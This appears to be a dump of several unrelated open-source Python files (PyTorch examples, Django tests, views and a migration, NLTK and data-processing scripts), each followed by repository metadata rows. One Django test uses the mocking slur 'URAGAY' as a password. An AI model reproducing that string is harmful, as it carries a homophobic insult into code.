print 'Adding uncertainty...'
#Enter final simulated speleothem record (choose from above options)
X=pseudoproxy
#X=d18O_wm2
#3.2.1 Simple Model: just add uncertainty bands based on measurement precision
sigma=0.1 # permil, measurement precision
lake_upper, lake_lower = analytical_err_simple(X,sigma)
#3.2.2 Gaussian Noise Model for analytical error:
sigma=0.1
#nsamples = ## enter number of samples here
lake_Xn=analytical_error(X,sigma)
#====================================================================
# Save whatever needs to be saved
print 'Saving data...'
outdir='./results/'
np.save(outdir+"lake_Xn.npy",lake_Xn)
#Whatever else...
#====================================================================
# ~
# ~
# ~
# ~
#======================================================================
# L7 PLOTTING EXAMPLES
#======================================================================
# Plotting! Uncomment to plot compaction profile
# plt.style.use('ggplot')
# fig2 = plt.figure(1)
# fig2.add_subplot(1,2,1)
# plt.plot(z,phi,'b')
# plt.xlabel(r'Depth (m)',fontsize=16)
# plt.ylabel(r'Porosity Profile ($\phi$) (unitless)',fontsize=16)
# plt.title(r'Porosity ($\phi$) Profile in Sediment Core',fontsize=16)
# plt.grid('on',color='grey')
# plt.tick_params(axis='both', which='major', labelsize=14)
# plt.xticks(fontname = "Helvetica") # This argument will change the font.
# plt.yticks(fontname = "Helvetica") # This argument will change the font.
# #======================================================================
# fig2.add_subplot(1,2,2)
# plt.plot(z,h_prime,'r',label=r'Compacted Layer')
# plt.plot(z,h,'b',label=r'Non-Compacted Original Layer')
# plt.xlabel(r'Depth (m)',fontsize=16)
# plt.ylabel(r'Sediment Height (m)',fontsize=16)
# plt.title(r'Depth Scale w/Compaction in Sediment Core',fontsize=16)
# plt.grid('on',color='grey')
# plt.tick_params(axis='both', which='major', labelsize=14)
# plt.xticks(fontname = "Helvetica") # This argument will change the font.
# plt.yticks(fontname = "Helvetica") # This argument will change the font.
# plt.legend(loc=2)
# plt.show()
# # ======================================================================
| 30.662722 | 99 | 0.623311 | 1,407 | 10,364 | 4.503198 | 0.357498 | 0.008523 | 0.012311 | 0.011995 | 0.122633 | 0.111585 | 0.098327 | 0.089173 | 0.089173 | 0.072601 | 0 | 0.030868 | 0.146662 | 10,364 | 337 | 100 | 30.753709 | 0.68555 | 0.573041 | 0 | 0.069565 | 0 | 0 | 0.111171 | 0.043069 | 0 | 0 | 0 | 0.002967 | 0 | 0 | null | null | 0 | 0.147826 | null | null | 0.052174 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
284c3be764ab685f75f4fd753408ac9d359e9431 | 1,578 | py | Python | spin_tensor.py | gicheonkang/pyTorch-101 | c22c97295127aed18575b2a2586f3d3b74195b22 | [
"MIT"
] | 2 | 2018-03-27T13:39:51.000Z | 2018-04-01T01:28:25.000Z | spin_tensor.py | gicheonkang/pyTorch-101 | c22c97295127aed18575b2a2586f3d3b74195b22 | [
"MIT"
] | null | null | null | spin_tensor.py | gicheonkang/pyTorch-101 | c22c97295127aed18575b2a2586f3d3b74195b22 | [
"MIT"
] | null | null | null | import torch
from torch.autograd import Variable
batch_size = 100
row_lenth = 10
col_length = 10
if __name__ == '__main__':
a = Variable(torch.randn((batch_size, row_lenth, col_length)))
b = Variable(torch.randn((batch_size, row_lenth, col_length)))
c = Variable(torch.randn((batch_size, row_lenth, col_length)))
sum = Variable(torch.zeros((batch_size, row_lenth, col_length)))
#for i in range(batch_size):
# sum[i, :, :] = a[i, :, :] + b[i, :, :]
# 1. addition
#d = torch.add(a, 1, b)
#e = torch.add(a, b)
# 2. tensor multiplication
#d = torch.zeros((batch_size, row_lenth, col_length))
#for i in range(batch_size):
# d[i, :, :] = torch.mm(a[i, :, :], b[i, :, :])
#e = torch.matmul(a, b)
#if torch.eq(d, e).sum() == 10000:
# print('true')
# 3. element-wise multiplication
#d = torch.FloatTensor([[1, 2], [3, 4]])
#e = torch.FloatTensor([[1, 2], [3, 4]])
#print(torch.addcmul(torch.zeros((2, 2)), value=1, tensor1=d, tensor2=e))
#print(d * e)
# 4. outer-product (vector, vector)
#d = torch.LongTensor([1, 2, 3, 4, 5]).unsqueeze(0)
#e = torch.mm(torch.t(d), d)
#print(e)
# 5. outer-product (matrix, matrix)
#t = (batch_size, row_lenth, row_lenth)
#d = torch.randn((batch_size, row_lenth))
#e = torch.randn((batch_size, row_lenth))
#f = d.unsqueeze(-1).expand(*t) * e.unsqueeze(-2).expand(*t) # (100, 10, 10)
#print(f.size())
#g = torch.randn((batch_size, row_lenth, row_lenth))
#for i in range(batch_size):
# g[i, :, :] = torch.mm(d[i, :].unsqueeze(1), e[i, :].unsqueeze(0))
#print(torch.eq(f, g).sum())
| 20.230769 | 77 | 0.614702 | 258 | 1,578 | 3.608527 | 0.236434 | 0.125671 | 0.116004 | 0.164339 | 0.44898 | 0.44898 | 0.262084 | 0.262084 | 0.262084 | 0.120301 | 0 | 0.036585 | 0.168568 | 1,578 | 77 | 78 | 20.493506 | 0.673018 | 0.673638 | 0 | 0 | 0 | 0 | 0.016598 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
285230a0d94b2eacdd02d29202ba9a8da6a7a8f6 | 1,374 | py | Python | app/core/tests/test_models.py | dumrich/profiles-rest-api | 9e9690f05c6ac2c9d3e1a43ae38715f841e1332d | [
"MIT"
] | null | null | null | app/core/tests/test_models.py | dumrich/profiles-rest-api | 9e9690f05c6ac2c9d3e1a43ae38715f841e1332d | [
"MIT"
] | null | null | null | app/core/tests/test_models.py | dumrich/profiles-rest-api | 9e9690f05c6ac2c9d3e1a43ae38715f841e1332d | [
"MIT"
] | 1 | 2020-02-09T13:35:01.000Z | 2020-02-09T13:35:01.000Z | from django.test import TestCase
from django.contrib.auth import get_user_model
from unittest.mock import patch
from core import models
class ModelTests(TestCase):
"""Test the core models"""
def test_create_user_with_email(self):
"""Create User with email"""
email = "abhinavchavali12@gmail.com"
password = "Abhinav!23"
user = get_user_model().objects.create_user(
email=email,
password=password
)
self.assertEqual(user.email, email)
self.assertTrue(user.check_password(password))
def test_normalize_email(self):
"""Normalize user email"""
email = "abhinavchavali34@GmAiL.cOm"
user = get_user_model().objects.create_user(email=email, password='URAGAY')
self.assertEqual(user.email, email.lower())
def test_user_invalid_email(self):
"""Test user invalid email"""
password = "Abhinav!23"
with self.assertRaises(ValueError):
get_user_model().objects.create_user(None, password)
def test_create_new_super_user(self):
"""create new super user"""
email = "abhinavchavali12@gmail.com"
password = "Abhinav!23"
user = get_user_model().objects.create_superuser(email=email, password=password)
self.assertTrue(user.is_superuser)
self.assertTrue(user.is_staff)
| 31.953488 | 88 | 0.665939 | 162 | 1,374 | 5.462963 | 0.283951 | 0.079096 | 0.067797 | 0.085876 | 0.39322 | 0.284746 | 0.251977 | 0.251977 | 0.251977 | 0.251977 | 0 | 0.01131 | 0.227802 | 1,374 | 42 | 89 | 32.714286 | 0.822809 | 0.080058 | 0 | 0.178571 | 0 | 0 | 0.092084 | 0.063005 | 0 | 0 | 0 | 0 | 0.214286 | 1 | 0.142857 | false | 0.285714 | 0.142857 | 0 | 0.321429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
285b8306e6f7f7a7eee878f8da6045d61f504466 | 2,001 | py | Python | src/data_split.py | futu-munich-racing/neural-network-trainer | 9ab73a691fe09e853955abf72a6b7559e2711a10 | [
"MIT"
] | null | null | null | src/data_split.py | futu-munich-racing/neural-network-trainer | 9ab73a691fe09e853955abf72a6b7559e2711a10 | [
"MIT"
] | 4 | 2020-11-13T18:37:11.000Z | 2022-02-10T01:24:26.000Z | src/data_split.py | futu-munich-racing/neural-network-trainer | 9ab73a691fe09e853955abf72a6b7559e2711a10 | [
"MIT"
] | null | null | null | import sys
import argparse
import logging
from utils import fileio
from utils import model_selection
def parse_input_arguments(argv):
parser = argparse.ArgumentParser()
parser.add_argument("-inputdir", type=str)
parser.add_argument("-outputdir", type=str)
parser.add_argument("-tub-dir-prefix", type=str, default="")
parser.add_argument("-train-split", type=float, default=0.7)
parser.add_argument("-val-split", type=float, default=0.15)
parser.add_argument("-test-split", type=float, default=0.15)
args = parser.parse_args()
# Normalize train/val/test split in case they don't sum up to one
# TODO: We could have some more intelligent way to make sure sum does not over 1.
# - Fix the given values. Use as much is left from the rest.
# - If all value are give e.g. 70, 15 15 then just perform the normalisation like now
split_sum = args.train_split + args.val_split + args.test_split
args.train_split /= split_sum
args.val_split /= split_sum
args.test_split /= split_sum
return args
def main(argv):
logger = logging.getLogger("DataSplitter")
logger.setLevel(logging.INFO)
# Read input arguments
logger.info("Parsing input arguments")
args = parse_input_arguments(argv)
# Read recorded data
logger.info("Reading input records")
records = fileio.process_donkey_data_dir(
inputdir=args.inputdir, tub_dir_prefix=args.tub_dir_prefix
)
# Split the data
logger.info("Splitting data into train/val/test-sets")
(
train_records,
val_records,
test_records,
) = model_selection.train_val_test_split_session_records(
records, args.train_split, args.val_split, args.test_split
)
# Generate split datasets
logger.info("Copying train/val/test data to output")
fileio.move_train_split_files(
args.inputdir, args.outputdir, train_records, val_records, test_records
)
if __name__ == "__main__":
main(sys.argv)
| 31.265625 | 91 | 0.705147 | 282 | 2,001 | 4.808511 | 0.386525 | 0.039823 | 0.075221 | 0.04646 | 0.193215 | 0.141593 | 0.057522 | 0.057522 | 0.057522 | 0 | 0 | 0.009346 | 0.197901 | 2,001 | 63 | 92 | 31.761905 | 0.835514 | 0.184408 | 0 | 0 | 0 | 0 | 0.127542 | 0 | 0 | 0 | 0 | 0.015873 | 0 | 1 | 0.047619 | false | 0 | 0.119048 | 0 | 0.190476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2860a01a6d4593f37b00c7b81f2e7066467831fd | 3,258 | py | Python | tests/integration/test_database/test_model/test_file_type.py | refitt/ref | 3ccc398e7b95f77549ab77884b87f40abdd3effb | [
"Apache-2.0"
] | 4 | 2020-09-11T01:15:11.000Z | 2021-05-12T16:46:48.000Z | tests/integration/test_database/test_model/test_file_type.py | refitt/ref | 3ccc398e7b95f77549ab77884b87f40abdd3effb | [
"Apache-2.0"
] | 12 | 2021-03-20T03:24:53.000Z | 2022-02-19T03:20:43.000Z | tests/integration/test_database/test_model/test_file_type.py | refitt/ref | 3ccc398e7b95f77549ab77884b87f40abdd3effb | [
"Apache-2.0"
] | 2 | 2021-02-01T23:49:39.000Z | 2021-12-11T19:01:23.000Z | # SPDX-FileCopyrightText: 2019-2021 REFITT Team
# SPDX-License-Identifier: Apache-2.0
"""Database file_type model integration tests."""
# external libs
import pytest
from sqlalchemy.exc import IntegrityError
# internal libs
from refitt.database.model import FileType, NotFound
from tests.integration.test_database.test_model.conftest import TestData
from tests.integration.test_database.test_model import json_roundtrip
class TestFileType:
"""Tests for `FileType` database model."""
def test_init(self, testdata: TestData) -> None:
"""Create file_type instance and validate accessors."""
for data in testdata['file_type']:
file_type = FileType(**data)
for key, value in data.items():
assert getattr(file_type, key) == value
def test_dict(self, testdata: TestData) -> None:
"""Test round-trip of dict translations."""
for data in testdata['file_type']:
file_type = FileType.from_dict(data)
assert data == file_type.to_dict()
def test_tuple(self, testdata: TestData) -> None:
"""Test tuple-conversion."""
for data in testdata['file_type']:
file_type = FileType.from_dict(data)
assert tuple(data.values()) == file_type.to_tuple()
def test_embedded_no_join(self, testdata: TestData) -> None:
"""Tests embedded method to check JSON-serialization."""
for data in testdata['file_type']:
assert data == json_roundtrip(FileType(**data).to_json(join=False))
def test_embedded(self) -> None:
"""Test embedded method to check JSON-serialization and auto-join."""
assert FileType.from_name('fits.gz').to_json(join=True) == {
'id': 1,
'name': 'fits.gz',
'description': 'Gzip compressed FITS file.'
}
def test_from_id(self, testdata: TestData) -> None:
"""Test loading file_type from `id`."""
# NOTE: `id` not set until after insert
for i, record in enumerate(testdata['file_type']):
assert FileType.from_id(i + 1).name == record['name']
def test_id_missing(self) -> None:
"""Test exception on missing file_type `id`."""
with pytest.raises(NotFound):
FileType.from_id(-1)
def test_id_already_exists(self) -> None:
"""Test exception on file_type `id` already exists."""
with pytest.raises(IntegrityError):
FileType.add({'id': 1, 'name': 'jpeg',
'description': 'A bad format for scientific images.'})
def test_from_name(self, testdata: TestData) -> None:
"""Test loading file_type from `name`."""
for record in testdata['file_type']:
assert FileType.from_name(record['name']).name == record['name']
def test_name_missing(self) -> None:
"""Test exception on missing file_type `name`."""
with pytest.raises(NotFound):
FileType.from_name('png')
def test_name_already_exists(self) -> None:
"""Test exception on file_type `name` already exists."""
with pytest.raises(IntegrityError):
FileType.add({'name': 'fits.gz',
'description': 'Gzip compressed FITS file.'})
| 38.785714 | 80 | 0.630141 | 397 | 3,258 | 5.025189 | 0.259446 | 0.080201 | 0.06015 | 0.07218 | 0.528321 | 0.475188 | 0.354386 | 0.313283 | 0.21604 | 0.059148 | 0 | 0.005689 | 0.244629 | 3,258 | 83 | 81 | 39.253012 | 0.804957 | 0.218232 | 0 | 0.208333 | 0 | 0 | 0.092854 | 0 | 0 | 0 | 0 | 0 | 0.145833 | 1 | 0.229167 | false | 0 | 0.104167 | 0 | 0.354167 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
28632dbedf679eac46f903ab0ddbd2badd934f93 | 338 | py | Python | NLP programmes in Python/5. Information Extraction/NP chunking (NER)/NP chunking (NER).py | AlexandrosPlessias/NLP-Greek-Presentations | 4ae9d635a777f24bae5238b9f195bd17d00040ea | [
"MIT"
] | null | null | null | NLP programmes in Python/5. Information Extraction/NP chunking (NER)/NP chunking (NER).py | AlexandrosPlessias/NLP-Greek-Presentations | 4ae9d635a777f24bae5238b9f195bd17d00040ea | [
"MIT"
] | null | null | null | NLP programmes in Python/5. Information Extraction/NP chunking (NER)/NP chunking (NER).py | AlexandrosPlessias/NLP-Greek-Presentations | 4ae9d635a777f24bae5238b9f195bd17d00040ea | [
"MIT"
] | null | null | null | # NP chunking (NER)
import nltk
f=open("sample.txt")
text=f.read()
sentences = nltk.sent_tokenize(text)
tokenized_sentences = [nltk.word_tokenize(sentence) for sentence in sentences]
tagged_sentences = [nltk.pos_tag(sentence) for sentence in tokenized_sentences]
for sent in tagged_sentences:
print (nltk.ne_chunk(sent))
| 28.166667 | 80 | 0.754438 | 48 | 338 | 5.145833 | 0.520833 | 0.157895 | 0.153846 | 0.17004 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142012 | 338 | 11 | 81 | 30.727273 | 0.851724 | 0.050296 | 0 | 0 | 0 | 0 | 0.032468 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2863a9572564b39e20759ab0a630c2aff85e9e7e | 1,811 | py | Python | gesund_projekt/pomodoros/views.py | asis2016/gesund-projekt | cb3828b69cd6a86deeab16943e38b6ebffd86abb | [
"MIT"
] | null | null | null | gesund_projekt/pomodoros/views.py | asis2016/gesund-projekt | cb3828b69cd6a86deeab16943e38b6ebffd86abb | [
"MIT"
] | null | null | null | gesund_projekt/pomodoros/views.py | asis2016/gesund-projekt | cb3828b69cd6a86deeab16943e38b6ebffd86abb | [
"MIT"
] | null | null | null | #
#
# This django app is not completed.
from django.contrib.auth.mixins import LoginRequiredMixin
from django.urls import reverse_lazy
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from django.views.generic import ListView
from .models import Pomodoro
class PomodoroListView(LoginRequiredMixin, ListView):
"""List all pomodoro."""
context_object_name = 'pomodoro_list'
model = Pomodoro
paginate_by = 10
template_name = 'pomodoros/index.html'
def get_queryset(self):
return Pomodoro.objects.all().filter(author=self.request.user).order_by('-datestamp')
def get_context_data(self, **kwargs):
context = super(PomodoroListView, self).get_context_data(**kwargs)
context['pomodoro_list_chart'] = Pomodoro.objects.all().filter(author=self.request.user).order_by(
'datestamp')
return context
class PomodoroCreateView(CreateView):
"""Create pomodoro."""
model = Pomodoro
template_name = 'pomodoros/add.html'
fields = ('datestamp', 'pomodoro_minutes', 'break_minutes', 'remarks')
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
class PomodoroUpdateView(UpdateView):
""" Update pomodoro. """
model = Pomodoro
context_object_name = 'pomodoro_obj'
template_name = 'pomodoros/update.html'
fields = ('datestamp', 'pomodoro_minutes', 'break_minutes', 'remarks')
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
class PomodoroDeleteView(DeleteView):
"""Delete pomodoro."""
model = Pomodoro
context_object_name = 'pomodoro_obj'
template_name = 'pomodoros/delete.html'
success_url = reverse_lazy('pomodoros-index')
| 31.224138 | 106 | 0.710105 | 205 | 1,811 | 6.107317 | 0.35122 | 0.031949 | 0.067093 | 0.067093 | 0.451278 | 0.42492 | 0.42492 | 0.42492 | 0.42492 | 0.42492 | 0 | 0.00134 | 0.175594 | 1,811 | 57 | 107 | 31.77193 | 0.83724 | 0.059083 | 0 | 0.378378 | 0 | 0 | 0.154762 | 0.025 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108108 | false | 0 | 0.135135 | 0.027027 | 0.864865 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
2865869a867cb57df929e1794ae8598dfae8a9b2 | 1,618 | py | Python | test/linear/ex1.py | taowu750/wtml | 906cb1c1832a8a1a389186d526ad12102c23a2e2 | [
"Apache-2.0"
] | null | null | null | test/linear/ex1.py | taowu750/wtml | 906cb1c1832a8a1a389186d526ad12102c23a2e2 | [
"Apache-2.0"
] | null | null | null | test/linear/ex1.py | taowu750/wtml | 906cb1c1832a8a1a389186d526ad12102c23a2e2 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
在整个练习中,您将使用脚本ex1.py和ex1 multi.py。
这些脚本为问题设置数据集并调用要编写的函数。你不需要修改它们中的任何一个。您只需要按照此分配中
的说明修改其他文件中的函数。对于这个编程练习,您只需要完成练习的第一部分,就可以用一个变量
实现线性回归。练习的第二部分是可选的,包括多变量线性回归。
假设你是一家连锁餐厅的首席执行官,正在考虑在不同的城市开设一家新的分店。这家连锁店在各个城市
都有卡车,你有数据显示城市的利润和人口。您希望使用此数据帮助您选择下一个要展开的城市。
文件ex1data1.txt包含线性回归问题的数据集。第一列是一个城市的人口,第二列是该城市食品卡车
的利润。负值表示亏损。
"""
import matplotlib.pyplot as plt
import numpy as np
from linear import LinearReg
if __name__ == '__main__':
'Part2: Plotting'
print('Plotting Data ...')
data = np.loadtxt('ex1data1.txt', delimiter=',')
X = data[:, :1]
y = data[:, 1:2]
m = data.shape[0]
plt.xlabel('Population of City in 10,000s')
plt.ylabel('Profit in $10,000s')
plt.plot(X, y, 'rx', markersize=6)
plt.show()
print('\nRunning Gradient Descent ...')
max_iter = 1500
li = LinearReg(max_iter=max_iter)
theta = li.train(X, y)
print('theta found by gradient descent:')
print(theta)
print('Expected theta values (approx):')
print(' -3.6303\n 1.1664')
# Plot the linear fit
i1, = plt.plot(X[:, 0], y, 'rx', markersize=6)
i2, = plt.plot(X[:, 0], li.predict(X), 'b-')
plt.legend([i1, i2], ['Training data', 'Linear regression'], loc='upper right')
plt.show()
predict1 = li.predict(np.array([1, 3.5]))
print('For population = 35,000, we predict a profit of %f' % (predict1 * 10000))
predict2 = li.predict(np.array([1, 7]))
print('For population = 70,000, we predict a profit of %f' % (predict2 * 10000))
'Part 4: Visualizing J(theta_0, theta_1)'
# TODO: 绘制直观的 3d 图像
| 27.896552 | 84 | 0.657602 | 220 | 1,618 | 4.777273 | 0.577273 | 0.019981 | 0.022835 | 0.020932 | 0.074215 | 0.041865 | 0.041865 | 0 | 0 | 0 | 0 | 0.059002 | 0.182942 | 1,618 | 57 | 85 | 28.385965 | 0.736006 | 0.243511 | 0 | 0.064516 | 0 | 0 | 0.327288 | 0 | 0 | 0 | 0 | 0.017544 | 0 | 1 | 0 | false | 0 | 0.096774 | 0 | 0.096774 | 0.258065 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
28748a0e99ca7df8968c84c26b4277b422294c17 | 459 | py | Python | scripts/cleanup.py | felis/kicad-schlib | 986c64aa0adae75446a3717976a6742d1b57f3ee | [
"CC0-1.0"
] | 38 | 2015-05-26T02:17:32.000Z | 2018-06-24T10:47:28.000Z | scripts/cleanup.py | felis/kicad-schlib | 986c64aa0adae75446a3717976a6742d1b57f3ee | [
"CC0-1.0"
] | 19 | 2016-03-26T17:20:20.000Z | 2018-03-31T19:22:21.000Z | scripts/cleanup.py | felis/kicad-schlib | 986c64aa0adae75446a3717976a6742d1b57f3ee | [
"CC0-1.0"
] | 22 | 2015-05-25T20:01:59.000Z | 2018-06-24T13:39:35.000Z | #!/usr/bin/python3
import os
import subprocess
import sys
md5sums = {}
dirname = sys.argv[1]
for fn in os.listdir(dirname):
md5sum = subprocess.check_output(['md5sum', os.path.join(dirname, fn)]).decode('ascii').partition(" ")[0]
if md5sum in md5sums:
# This blob already exists. Symlink it
os.unlink(os.path.join(dirname, fn))
os.symlink(md5sums[md5sum], os.path.join(dirname, fn))
else:
md5sums[md5sum] = fn
| 22.95 | 109 | 0.651416 | 64 | 459 | 4.65625 | 0.515625 | 0.060403 | 0.100671 | 0.171141 | 0.231544 | 0.167785 | 0 | 0 | 0 | 0 | 0 | 0.032698 | 0.200436 | 459 | 19 | 110 | 24.157895 | 0.779292 | 0.117647 | 0 | 0 | 0 | 0 | 0.029777 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
287bd37592c6d354809a9ac7ecfe94395a48d62b | 743 | py | Python | example/urls.py | bennylope/django-shop | 7e7cd743773405f193abefdb8aa30f28b17d71cd | [
"BSD-3-Clause"
] | 1 | 2015-03-23T20:40:39.000Z | 2015-03-23T20:40:39.000Z | example/urls.py | bennylope/django-shop | 7e7cd743773405f193abefdb8aa30f28b17d71cd | [
"BSD-3-Clause"
] | null | null | null | example/urls.py | bennylope/django-shop | 7e7cd743773405f193abefdb8aa30f28b17d71cd | [
"BSD-3-Clause"
] | null | null | null | from django.conf.urls.defaults import *
from shop.views import ShopTemplateView
from shop import urls as shop_urls
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Example:
# (r'^shop_example/', include('shop_example.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
(r'^admin/', include(admin.site.urls)),
#Home
url(r'^$', ShopTemplateView.as_view(template_name="shop/welcome.html"),
name='shop_welcome'),
(r'^', include(shop_urls)), # <-- That's the important bit
)
| 28.576923 | 75 | 0.695828 | 100 | 743 | 5.1 | 0.43 | 0.076471 | 0.094118 | 0.078431 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166891 | 743 | 25 | 76 | 29.72 | 0.82391 | 0.345895 | 0 | 0 | 0 | 0 | 0.165272 | 0.060669 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
2881054007cf9eb1d5b97fa959953a1f71dabe7a | 1,212 | py | Python | drf_tools/validation/base.py | seebass/drf-toolbox | a24b1db9c42c6af4b939f9dd0181fc9eaf5076f1 | [
"MIT"
] | 5 | 2015-10-14T13:11:06.000Z | 2019-11-08T12:18:36.000Z | drf_tools/validation/base.py | seebass/drf-toolbox | a24b1db9c42c6af4b939f9dd0181fc9eaf5076f1 | [
"MIT"
] | null | null | null | drf_tools/validation/base.py | seebass/drf-toolbox | a24b1db9c42c6af4b939f9dd0181fc9eaf5076f1 | [
"MIT"
] | 1 | 2020-07-04T07:11:33.000Z | 2020-07-04T07:11:33.000Z | from abc import ABCMeta, abstractmethod
from django_tooling.exceptions import ValidationError
class FailedValidation():
def __init__(self, code, details, msg):
self.code = code
self.details = details
self.msg = msg
if msg and details:
self.msg = msg.format(**details)
class Validation(metaclass=ABCMeta):
"""
Base class for all validations.
The registered key is the app name plus the snake_case version of the class name.
NameTooLong in secretobject will be available as secretobject_name_too_long
"""
def __init__(self, fieldName=None):
self.__fieldName = fieldName
self.__failedValidations = list()
@abstractmethod
def _validate(self):
pass
def validate(self, raiseError=True):
self._validate()
if self.__failedValidations and raiseError:
raise ValidationError([failedValidation.msg for failedValidation in self.__failedValidations], self.__fieldName)
def _addFailure(self, code, details=None, msg=None):
self.__failedValidations.append(FailedValidation(code, details, msg))
def getFailedValidations(self):
return self.__failedValidations
| 30.3 | 124 | 0.69967 | 133 | 1,212 | 6.150376 | 0.443609 | 0.128362 | 0.026895 | 0.041565 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.226073 | 1,212 | 39 | 125 | 31.076923 | 0.872068 | 0.155941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.041667 | 0.083333 | 0.041667 | 0.458333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
288139eeaade5a3d49aa1c45ca64936eb8a55d9b | 455 | py | Python | osr/apps/registry/migrations/0006_auto_20191029_2325.py | offurface/osr | 83ebcc11f0d9d8050ac2139bc6e9e560e93e8b9e | [
"MIT"
] | null | null | null | osr/apps/registry/migrations/0006_auto_20191029_2325.py | offurface/osr | 83ebcc11f0d9d8050ac2139bc6e9e560e93e8b9e | [
"MIT"
] | 10 | 2021-03-19T09:01:32.000Z | 2022-02-10T21:34:43.000Z | osr/apps/registry/migrations/0006_auto_20191029_2325.py | offurface/osr | 83ebcc11f0d9d8050ac2139bc6e9e560e93e8b9e | [
"MIT"
] | null | null | null | # Generated by Django 2.2.6 on 2019-10-29 20:25
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('registry', '0005_auto_20191029_2312'),
]
operations = [
migrations.AlterField(
model_name='primary',
name='recommendations',
field=models.ManyToManyField(blank=True, to='registry.Sport_type', verbose_name='Рекомендации'),
),
]
